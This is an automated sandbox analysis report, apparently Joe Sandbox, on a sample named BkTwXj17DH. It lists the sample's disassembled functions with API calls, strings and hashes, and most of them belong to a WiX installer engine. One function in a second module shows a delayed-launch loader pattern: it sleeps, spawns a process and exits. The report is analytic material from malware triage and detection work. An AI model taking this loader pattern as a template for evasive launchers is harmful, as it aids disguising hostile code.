Instruction ID: e3dc19ff50b3c99d7cfae0367e3c0ea141930aa8ae53ec9781ae541f0a806d10
Opcode Fuzzy Hash: 1e4f9f9aba6301a3d266d98a70fc88b981bdec99698bbd669462232c0ea5731d
Instruction Fuzzy Hash: 0721F97BE407367AD72516AD5D46F2B6A9CEB01BB0B028326BD48BB280F750DC0485F2

Function 00D8FCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00D8FCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 00D8FCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00D8FD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00D8FD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00D8FD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00D8FD8B

Strings

SystemFunction040, xrefs: 00D8FCCB
SystemFunction041, xrefs: 00D8FCD8
Crypt32.dll, xrefs: 00D8FD0C
cryputil.cpp, xrefs: 00D8FD60
CryptProtectMemory, xrefs: 00D8FD20
CryptUnprotectMemory, xrefs: 00D8FD6C
AdvApi32.dll, xrefs: 00D8FCB5

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: f0be37f996ab678fedbcf01ffc8be8db6aaf02ba167836e7695295d2cd07d815
Instruction ID: ab5dd3a155bed7752ac212adc71271fb6ec4fbbf952cbf275fb2c71f6c9f9438
Opcode Fuzzy Hash: f0be37f996ab678fedbcf01ffc8be8db6aaf02ba167836e7695295d2cd07d815
Instruction Fuzzy Hash: AF212132941325DBC731AB56AD05B9A69D0EB00BB1F1A0237EE01EB360E7E4DC049BF1

Function 00D708C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00D708F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00D7090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00D7090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00D70912
GetLastError.KERNEL32(?,?), ref: 00D7091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00D7098B
GetLastError.KERNEL32(?,?), ref: 00D70998

Strings

Failed to open cabinet file: %hs, xrefs: 00D709C9
Failed to add virtual file pointer for cab container., xrefs: 00D70971
<the>.cab, xrefs: 00D708EB
cabextract.cpp, xrefs: 00D70940, 00D709BC
Failed to duplicate handle to cab container., xrefs: 00D7094A

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: a2baa87eb66506180600a645bf46fd12bd26e1a836697669df760c67b60064ca
Instruction ID: 0491e53b37a87fb345d0c05826efe61df10feecdc69191190af32e8e9d987226
Opcode Fuzzy Hash: a2baa87eb66506180600a645bf46fd12bd26e1a836697669df760c67b60064ca
Instruction Fuzzy Hash: 6E31C332941235FBEB215B559D49E9FBE68EF05760F164216FE48B7280E7209D00CAF1

Function 00D63F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00D63AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00D63FB5,feclient.dll,?,00000000,?,?,?,00D54B12), ref: 00D63B42

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00D54B12,?,?,00D9B488,?,00000001,00000000,00000000), ref: 00D6404C

Strings

Failed to copy log extension to extension., xrefs: 00D64191
crypt32.dll, xrefs: 00D63FF2, 00D64057, 00D6405F, 00D640C6, 00D64100, 00D64141, 00D64160, 00D6419E, 00D641C8
feclient.dll, xrefs: 00D63FAF, 00D6405C
clbcatq.dll, xrefs: 00D64185
Failed to open log: %ls, xrefs: 00D640C8
Failed to get current directory., xrefs: 00D6402E
log, xrefs: 00D63FF3
msasn1.dll, xrefs: 00D64162, 00D641A3
Failed to copy log path to prefix., xrefs: 00D6416E
Setup, xrefs: 00D63FF9
Failed to copy full log path to prefix., xrefs: 00D641AF
Failed to get non-session specific TEMP folder., xrefs: 00D640F6

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: c77ac525d8fd96f5ad071f91a2adc5254b6fb0ab9ab3369d5ed85a031e226587
Instruction ID: f05d15d47d050e08dc63531490b3af3aa230df6719d3ffd60e8ec70f1cb68301
Opcode Fuzzy Hash: c77ac525d8fd96f5ad071f91a2adc5254b6fb0ab9ab3369d5ed85a031e226587
Instruction Fuzzy Hash: FE61AC71A00726AFDF269F64CC42A6A7BA9EF26740F084165FD00DB140EB74EE9497B0

Function 00D56DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,00D55445,00000006,?,00D582B9,?,?,?,00000000,00000000,00000001), ref: 00D56DC8

Part of subcall function 00D556A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00D56595,00D56595,?,00D5563D,?,?,00000000), ref: 00D556E5
Part of subcall function 00D556A9: GetLastError.KERNEL32(?,00D5563D,?,?,00000000,?,?,00D56595,?,00D57F02,?,?,?,?,?), ref: 00D55714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,00D582B9), ref: 00D56F59

Strings

variable.cpp, xrefs: 00D56E4B
Unsetting variable '%ls', xrefs: 00D56F15
Failed to insert variable '%ls'., xrefs: 00D56E0D
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00D56ED0
Attempt to set built-in variable value: %ls, xrefs: 00D56E56
Setting hidden variable '%ls', xrefs: 00D56E86
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00D56F6B
Setting numeric variable '%ls' to value %lld, xrefs: 00D56EFA
Failed to find variable value '%ls'., xrefs: 00D56DE3
Failed to set value of variable: %ls, xrefs: 00D56F41
Setting string variable '%ls' to value '%ls', xrefs: 00D56EED

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: 00397d2a55b857d68aac0975efbb24791f91982d90fa3ca154d11bd069a9c854
Instruction ID: c473f255ec40500cb42dc8a856185825b14b789fbecdd74bad91caca728ad53c
Opcode Fuzzy Hash: 00397d2a55b857d68aac0975efbb24791f91982d90fa3ca154d11bd069a9c854
Instruction Fuzzy Hash: 34510471A00225ABCF309F19DC4AF6B3BA8EF55B12F94411AFC4467282C271EC48CAF1

Function 00D54AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00D54C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D54C75

Strings

Failed to set layout directory variable to value provided from command-line., xrefs: 00D54C06
WixBundleLayoutDirectory, xrefs: 00D54BF5
Failed to create the message window., xrefs: 00D54B98
Failed to open log., xrefs: 00D54B18
Failed while running , xrefs: 00D54C2A
Failed to set registration variables., xrefs: 00D54BDE
Failed to set action variables., xrefs: 00D54BC4
Failed to query registration., xrefs: 00D54BAE
Failed to check global conditions, xrefs: 00D54B49

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: a0e6f313528eaaf7e02ddf8928b1a65e324eb4c74aa187578e560d998394f067
Instruction ID: 4ca196f16b9d54c0c91f3d7ff49126b7203948da261e790b703c3a124a3ed17f
Opcode Fuzzy Hash: a0e6f313528eaaf7e02ddf8928b1a65e324eb4c74aa187578e560d998394f067
Instruction Fuzzy Hash: C341243160161ABFCF165A60CD45FBAB66CFF0076AF050216FC44A2140EBB0ED989AF2

Function 00D52DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00D52E5F
GetLastError.KERNEL32 ref: 00D52E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00D52F09
CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00D52F96
GetLastError.KERNEL32 ref: 00D52FA3
Sleep.KERNEL32(00000064), ref: 00D52FB7
CloseHandle.KERNEL32(?), ref: 00D5301F

Strings

%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00D52F66
4Wu, xrefs: 00D52E5F
pathutil.cpp, xrefs: 00D52E8D

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4Wu$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-3300617194
Opcode ID: f9677e70f7c67b3729ac9ba5e8a0fbc87fd9b29e4916ee8ff0694a8fb6f4de78
Instruction ID: c13f2c0bf44c68174e91377806de545f1e0e606ac37bf20565e146a234ac6e45
Opcode Fuzzy Hash: f9677e70f7c67b3729ac9ba5e8a0fbc87fd9b29e4916ee8ff0694a8fb6f4de78
Instruction Fuzzy Hash: 6A716472D01229ABDF319F58ED49BAEB7B4AB09751F050195FD04E7290D7349E888F70

Function 00D6EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00D5548E,?,?), ref: 00D6EA9D
GetLastError.KERNEL32(?,00D5548E,?,?), ref: 00D6EAAA
CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 00D6EB03
GetLastError.KERNEL32(?,00D5548E,?,?), ref: 00D6EB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00D5548E,?,?), ref: 00D6EB4B
CloseHandle.KERNEL32(00000000,?,00D5548E,?,?), ref: 00D6EB6A
CloseHandle.KERNELBASE(?,?,00D5548E,?,?), ref: 00D6EB77

Strings

Failed to create the UI thread., xrefs: 00D6EB3B
uithread.cpp, xrefs: 00D6EACB, 00D6EB31
Failed to create initialization event., xrefs: 00D6EAD5

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 5ed48d49223c741532063970f13e77a6e6b6fd58a85b05b1034268ce1380ae91
Instruction ID: fbfefcadccb8faaa6428a479a941f6163bd6fdc495c1128ee50379f6b9c480cd
Opcode Fuzzy Hash: 5ed48d49223c741532063970f13e77a6e6b6fd58a85b05b1034268ce1380ae91
Instruction Fuzzy Hash: 1331747AD41229BFDB10DF999D85A9FFBA8FF04760F11016AB905F7240E7309E0086B1

Function 00D714E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,75572F60,?,?,00D55405,00D553BD,00000000,00D55445), ref: 00D71506
GetLastError.KERNEL32 ref: 00D71519
GetExitCodeThread.KERNELBASE(00D9B488,?), ref: 00D7155B
GetLastError.KERNEL32 ref: 00D71569
ResetEvent.KERNEL32(00D9B460), ref: 00D715A4
GetLastError.KERNEL32 ref: 00D715AE

Strings

Failed to wait for operation complete event., xrefs: 00D7154A
Failed to get extraction thread exit code., xrefs: 00D7159A
Failed to reset operation complete event., xrefs: 00D715DF
cabextract.cpp, xrefs: 00D71540, 00D71590, 00D715D5

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 0a081713dd9f844e0a98ed227aa8e0009d1b0d9569e7045899b3c74197892c03
Instruction ID: ff00a1a7370abed9eeeab010bf7d9751c34174c9d36291916381560a559ac097
Opcode Fuzzy Hash: 0a081713dd9f844e0a98ed227aa8e0009d1b0d9569e7045899b3c74197892c03
Instruction Fuzzy Hash: F731A275B00305AFDB149F6E9D01AAF7BF8EB44710B10825BF94ADA260F730DA049B75

Function 00D5CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,00D553BD,00000000,00D55489,00D55445,WixBundleUILevel,840F01E8,?,00000001), ref: 00D5CC1C

Strings

Failed to get next stream., xrefs: 00D5CD03
Failed to ensure directory exists, xrefs: 00D5CCEE
Failed to concat file paths., xrefs: 00D5CCFC
Failed to extract file., xrefs: 00D5CCE7
Failed to find embedded payload: %ls, xrefs: 00D5CC48
Failed to get directory portion of local file path, xrefs: 00D5CCF5
payload.cpp, xrefs: 00D5CD1D
Payload was not found in container: %ls, xrefs: 00D5CD29

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: 4ff1cb5b8bd5771c3e38201a32344a59d3306a246b612ecdc3e846c943fd07eb
Instruction ID: 7b7e3f7b1cc160413f0ef8c3d57a99177554cd0df5d8b7a8b7b93e9ce7067be7
Opcode Fuzzy Hash: 4ff1cb5b8bd5771c3e38201a32344a59d3306a246b612ecdc3e846c943fd07eb
Instruction Fuzzy Hash: CD41BB31910319AFCF259F88CC819AEBBB5EF00712B14916AEC55AB251D7709D88DBB0

Function 00D54796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00D547BB
GetCurrentThreadId.KERNEL32 ref: 00D547C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D5484F

Strings

wininet.dll, xrefs: 00D547EE
Failed to start bootstrapper application., xrefs: 00D5481D
Failed to load UX., xrefs: 00D54804
engine.cpp, xrefs: 00D5489B
Failed to create engine for UX., xrefs: 00D547DB
Unexpected return value from message pump., xrefs: 00D548A5

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: 66b6e8fb0a3f2671c296fbe49ee93c65f098e935a0099027c0c09017652c2835
Instruction ID: 3d9c46a5a2869421ea139b0c47f045da0e99644df5461e6e88a6b04c4d494db8
Opcode Fuzzy Hash: 66b6e8fb0a3f2671c296fbe49ee93c65f098e935a0099027c0c09017652c2835
Instruction Fuzzy Hash: DD41A271600655BFDF149BA4DC85EBA7B6CEF0432AF100226FD04E7250DB21ED8987B1

Function 00D5D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00D547FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00D5548E,?), ref: 00D5D6DA
GetLastError.KERNEL32(?,00D547FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00D5548E,?,?), ref: 00D5D6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00D5D71F
GetLastError.KERNEL32(?,00D547FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00D5548E,?,?), ref: 00D5D72B

Strings

Failed to get BootstrapperApplicationCreate entry-point, xrefs: 00D5D756
userexperience.cpp, xrefs: 00D5D708, 00D5D74C
BootstrapperApplicationCreate, xrefs: 00D5D719
Failed to create UX., xrefs: 00D5D76F
Failed to load UX DLL., xrefs: 00D5D712

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: 90e4de6b0eb323590627e86e7e0161d3950ab907cac53b015f66de44fc7144a8
Instruction ID: 24687cf76b01b38c2548bff4b4166ed72d64592be066d77cafb4da54aae46aef
Opcode Fuzzy Hash: 90e4de6b0eb323590627e86e7e0161d3950ab907cac53b015f66de44fc7144a8
Instruction Fuzzy Hash: 0411EB37A80732ABCF315B955C05F1B7A55AF09B62F020526FE55FB280EB60DC0846F0

Function 6FFF91F2 Relevance: 15.1, APIs: 10, Instructions: 92memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(70014DA0), ref: 6FFF91FE
GetProcAddress.KERNEL32(00000000,70017AF8), ref: 6FFF920B
Sleep.KERNELBASE(00007530), ref: 6FFF9216
GetProcessHeap.KERNEL32 ref: 6FFF9218
HeapAlloc.KERNEL32(00000066,00000000,?,19930522,00000000,1FFFFFFF), ref: 6FFF9227
GetModuleFileNameW.KERNEL32(?,00000000,00000104), ref: 6FFF9243
GetProcAddress.KERNEL32(?,?), ref: 6FFF92B4
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 6FFF92CB
WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?), ref: 6FFF92D5
ExitProcess.KERNEL32 ref: 6FFF92DD

Memory Dump Source

Source File: 00000002.00000002.1473718663.000000006FFF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FFF0000, based on PE: true

Associated: 00000002.00000002.1473682170.000000006FFF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1473759971.000000007000A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1473927328.000000007001A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1473974077.000000007001C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fff0000_BkTwXj17DH.jbxd

Similarity

API ID: Process$AddressHeapModuleProc$AllocCreateExitFileHandleNameObjectSingleSleepWait
String ID:
API String ID: 206643222-0
Opcode ID: 799112ebd484d3419e3a9ec859843362b1503e5e2193a5099bae64c11ded6177
Instruction ID: ed39171e1702076997795f793abc39517004044b0e3fc3b8a4db66ef39653ab7
Opcode Fuzzy Hash: 799112ebd484d3419e3a9ec859843362b1503e5e2193a5099bae64c11ded6177
Instruction Fuzzy Hash: 7F217E72608304AFE7209F6ACC84B7A73F9BF89B11F144529F996C61A4EB74E851C721

Function 00D5F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00D5F942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00D5F94F

Strings

Failed to open registration key., xrefs: 00D5F8AB
%ls.RebootRequired, xrefs: 00D5F82F
Failed to format pending restart registry key to read., xrefs: 00D5F846
Failed to read Resume value., xrefs: 00D5F8D8
Resume, xrefs: 00D5F8B6

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 8843abca03fa18596877d1f8bce7623dfbec890659b7482222b77a4006510559
Instruction ID: 6501f7fbba121917e02f3179d58ea03bb63182214d8058e375e098ac4ece48f7
Opcode Fuzzy Hash: 8843abca03fa18596877d1f8bce7623dfbec890659b7482222b77a4006510559
Instruction Fuzzy Hash: 63413BB5940519FFCF119F98C881AADBBA4EB05311F194176EC54AF250C3729E499FA0

Function 00D90523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00DBB5FC,00000000,?,?,?,00D64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D554FA,?), ref: 00D90533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00DBB5F4,?,00D64207,00000000,Setup), ref: 00D905D7
GetLastError.KERNEL32(?,00D64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D554FA,?,?,?), ref: 00D905E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00D64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D554FA,?), ref: 00D90621

